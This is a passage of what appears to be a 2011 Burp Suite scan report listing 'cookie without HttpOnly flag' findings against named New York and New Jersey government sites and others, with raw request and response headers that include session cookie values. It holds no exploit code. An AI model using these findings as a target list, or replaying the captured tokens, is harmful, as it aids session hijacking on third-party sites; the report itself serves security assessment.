Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.mybenefits.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 13 Jul 2011 01:50:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Liferay-Portal: Liferay Portal Enterprise Edition 6.0 EE SP1 (Bunyan / Build 6011 / January 13, 2011)
ETag: "3bf491b4"
Content-Type: text/html;charset=UTF-8
Content-Length: 33290
Set-Cookie: JSESSIONID=5E672420895F3B98A26F8AFC3DE47B0C; Path=/
Set-Cookie: GUEST_LANGUAGE_ID=en_US; Expires=Thu, 12-Jul-2012 01:50:10 GMT; Path=/
Set-Cookie: COOKIE_SUPPORT=true; Expires=Thu, 12-Jul-2012 01:50:10 GMT; Path=/
Set-Cookie: I4WEB_IID=1677;path=/;
Set-Cookie: PPortalROUTEID=.3; path=/
Connection: close

<!DOCTYPE html> <html class="ltr" dir="ltr" lang="en-US"><script LANGUAGE="JavaScript1.2">
<!--
// Precise/Indepth For Web code v9.0
if (typeof(TextDate) == 'undefined' && location.host != "") {va
...[SNIP]...

7.10. http://www.njleg.state.nj.us/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.njleg.state.nj.us
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 13 Jul 2011 01:50:00 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 86262
Content-Type: text/html
Expires: Tue, 12 Jul 2011 09:10:00 GMT
Set-Cookie: ASPSESSIONIDAADDSACS=EHFKMCHBKABALIEPADMHHJAI; path=/
Cache-control: private


<html>
<head>
<style type="text/css">
<!--

A.blk:link {color: #000000; text-decoration: none;}
A.blk:visited {color: #000000; text-decoration: none;}
A.blk:active {color: #910000; text-d
...[SNIP]...

7.11. http://www.njleg.state.nj.us/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.njleg.state.nj.us
Path:   /Default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 13 Jul 2011 01:49:59 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 86262
Content-Type: text/html
Expires: Tue, 12 Jul 2011 09:10:00 GMT
Set-Cookie: ASPSESSIONIDAADDSACS=BHFKMCHBAILGMCBNDLEBOAHM; path=/
Cache-control: private


<html>
<head>
<style type="text/css">
<!--

A.blk:link {color: #000000; text-decoration: none;}
A.blk:visited {color: #000000; text-decoration: none;}
A.blk:active {color: #910000; text-d
...[SNIP]...

7.12. http://www.nydoctorprofile.com/welcome.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nydoctorprofile.com
Path:   /welcome.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.jsp HTTP/1.1
Host: www.nydoctorprofile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:45:37 GMT
Content-Length: 11605
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=kSFPTc4Br0jyLwFQyTxfGWFDnV7QPZgdQjJ63rH59xwQsGWfhvb6!1337677152; path=/
X-Powered-By: Servlet/2.4 JSP/2.0

<html>
<head>
<title>New York State Physician Profile </title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--
function MM_swapImgRes
...[SNIP]...

7.13. http://www.opensource.org/licenses/gpl-3.0.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-3.0.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-3.0.html HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:16 GMT
Server: Apache/2.2.19 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ptef1q92e6ahqi733m5ck1hu30; expires=Fri, 05-Aug-2011 05:23:36 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 13 Jul 2011 01:46:46 GMT
ETag: "e73d99926e74ae2d28e0d29f4e2b995f"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

7.14. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:15 GMT
Server: Apache/2.2.19 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ga7kus4qs2c78hilc93rk8sjc2; expires=Fri, 05-Aug-2011 05:23:35 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 13 Jul 2011 01:46:29 GMT
ETag: "e3748fe2bbaca53c3b673355a01e8f37"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

7.15. http://www.otda.state.ny.us/main/workingfamilies/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.otda.state.ny.us
Path:   /main/workingfamilies/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/workingfamilies/default.asp HTTP/1.1
Host: www.otda.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 13 Jul 2011 01:52:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.otda.state.ny.us:80/workingfamilies/default.asp
Content-Length: 3485
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRBBSDS=FKAOHBPBALLOKCLEOEOODIII; path=/
Cache-control: private

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>Page Not Found | OTDA</title>
<meta name=
...[SNIP]...

7.16. http://www.visitnj.org/events  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visitnj.org
Path:   /events

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:26 GMT
ETag: "1c02c8d04dbc4f40ed09302c3263264b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...

7.17. http://www.visitnj.org/new-jerseys-wineries  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visitnj.org
Path:   /new-jerseys-wineries

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 22:00:07 GMT
ETag: "fcfdc2bb205847c6a67cce0b8add1bc2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42712

<table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;"><tr><th colspan="2"> Database Error</th></tr>
<tr><td align="right" valign="top">Message:</td><td>[<b>M
...[SNIP]...

7.18. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www1.state.nj.us
Path:   /TYTR_Saver/jsp/common/Login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TYTR_Saver/jsp/common/Login.jsp HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:45 GMT
Content-type: text/html
Set-cookie: JSESSIONID=212f7dfab86ed2f492b92e02d519;Path=/TYTR_Saver
Set-cookie: JROUTE=Wr84;Path=/TYTR_Saver
Connection: close


<HTML>
<head>
<!--
<TITLE>File Your NJ SAVER Online! - NJ Taxation</TITLE>
-->
<TITLE>File Your Homestead Benefit Online</TITLE>
<!--<LINK REL="stylesheet" HREF
...[SNIP]...

7.19. https://www6.state.nj.us/LOT_LVC/LogAndLoad  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www6.state.nj.us
Path:   /LOT_LVC/LogAndLoad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LOT_LVC/LogAndLoad HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html
Location: https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp?error=true
Set-cookie: JSESSIONID=4D801CEBB311CDAC45E7450C7DF7FA2A;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<html><head>
<title>
Sun ONE Application Server - HTTP Status 302 Error
</title>
<STYLE><!--
BODY{font-family : verdana, geneva, helvetica, arial, sans-serif; color : black;background-color : white;}

...[SNIP]...

7.20. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www6.state.nj.us
Path:   /LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LOT_LVC/jsp/lvc1_0_vip_reg.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=C2D1D22C30B568638365FC0BBB7F4E87;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

7.21. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www6.state.nj.us
Path:   /LOT_LVC/jsp/lvc1_S0_login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LOT_LVC/jsp/lvc1_S0_login.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=16461B7951076D32FDBB1BA8E456A263;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

7.22. https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www6.state.nj.us
Path:   /LOT_LVC/jsp/lvc2_0_vip_forgot.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LOT_LVC/jsp/lvc2_0_vip_forgot.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:46 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=FB888807FE5D253932A30F86C16CC14E;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

7.23. http://511ny.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://511ny.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: 511ny.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=MIIUUIS192.168.213.53CKOMO; path=/
Connection: close
Date: Wed, 13 Jul 2011 01:54:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tcwj1jrq1snk0w3t5szfzpqw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...

7.24. http://ads.doclix.com/adserver/serve/js/banner_unit.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/banner_unit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/serve/js/banner_unit.jsp?pid=16609&codeId=2351&cnt=1&width=728&height=90&pageId=66798966&refUrl=http%3A//soris.us/&ref= HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=YmFubmVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 38237
Connection: close


<!DOCTYPE HTML>
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>AdSide: Sponsored Links</title>
       <script src="doclix_lib.js" type="text/javascri
...[SNIP]...

7.25. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/pop_under_unit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/serve/js/pop_under_unit.jsp?pid=16609&codeId=3794&refUrl=http%3A//soris.us/&ref= HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=cG9wX3VuZGVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 17041
Connection: close

<!DOCTYPE HTML>
<html>
       <head>
                       
           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>AdSide: Sponsored Links</title>
           <script src="doclix_lib.js" type="tex
...[SNIP]...

7.26. http://images.apple.com/global/nav/styles/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=546
Expires: Wed, 13 Jul 2011 02:08:44 GMT
Date: Wed, 13 Jul 2011 01:59:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=0UnL/zxOv1wWLvbsWR94vThVNFRL+VrVChrGyouncnHM3RJMc0OunWy9Iw1KYllglK6BzBYmmP70PPXySvjQrQRr7GhCttd/4huailsTJ8NIePwbCOJO2s7gpkApsymcrQnuHMcKstsMu0BAp1qc7xTgnAIN4iuUF5uw2M1rmo/cllWpet7twXmFAr3zg+2zFmCpTKJ/akdqFozM2Gjavk0dnS0dTqHcwjhvleYzL+SBU6hOq7l+aI8afJDgyTfi7XAB/bP9nrhTwK/nD4N6oH+g6IXrGspDRaXHbWEnya2CdRbitwUAtHcIjU1Uy5SR3pQDqqo7XI+jv41vcgvf0vRB4oKWRzS/hHLY0NCMW04UQMf2u2g9SSm5FZWpIpUI58iDq78i5bp7fZPd4Et8ZmFkCYxUkLx42YrXu0T9nOJyJl07nB844YaoEMKgvSvUPM2ss+jIv8YjICsWlytE2sSVlw0DBNEA9uL1Pe1k1m41bpjryqDOi8vgtW4HelOL1Hum8RiUvIoGMlmherfTe6RUfzSCpPmpK/MxiAMWnGtjVcb/o4TlyMiqxsde+eBU; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


7.27. http://images.apple.com/ipod/images/gradient_texture20100901.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /ipod/images/gradient_texture20100901.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipod/images/gradient_texture20100901.jpg HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "a9a-48f2afe054800"
If-Modified-Since: Wed, 01 Sep 2010 04:18:40 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 04:18:40 GMT
ETag: "a9a-48f2afe054800"
Cache-Control: max-age=418
Expires: Wed, 13 Jul 2011 02:06:36 GMT
Date: Wed, 13 Jul 2011 01:59:38 GMT
Connection: close
Set-Cookie: ccl=wj1HqN0mf/88OaLzQaD2+dQLJRv8wdQHGvAl27D3twW/DxLqTJXahfgnbRGYoUOIKVBrIsfTyWmD+LeXVMkGZjreOV1XSiLWfQeToJiTN6/MP3ur9Fk+TLxUgCNGFqsm0ZH5uwqmzOR8OhHqQfWbXUa6ID4j4T2NC1X5iaDLigBhjzpNUF26WY72wPWbQp01HaSDNytaSod4G6It8FL0wN0152nDp/eHRDA81nhZL1wGrH6EyYBx4JodHgeAGHwNG76mnLxDNL7N8yeHw9ruwTZo1BuDBRfuH56WwFbdWzua9s8v5vqECPNa9oUpkUBb6YqGJYwwkdE6+V7mA4WkVPb31Fq0C8p31qhe1R+J4C5HoU7gZJycSFtDWzk8tS8JPzj5y4L7gxdAMfYh+zqkixXLx4YQi3WQLtAF15r2hAeef5mgYJExuQrg9s9hEueOHUS2apbL1IFPdihDoGHvCpo9dvGEWwMuhkDyEP0Kn81boO+m3ZhOwGX8JkfKNQHxl14p2YTLx3k2YVZ266qYhbKlMbAWmvKCzb3BH0c587Zb9ZwzTFqLw6mE3pfCjadj; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


7.28. http://israel.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://israel.house.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: israel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

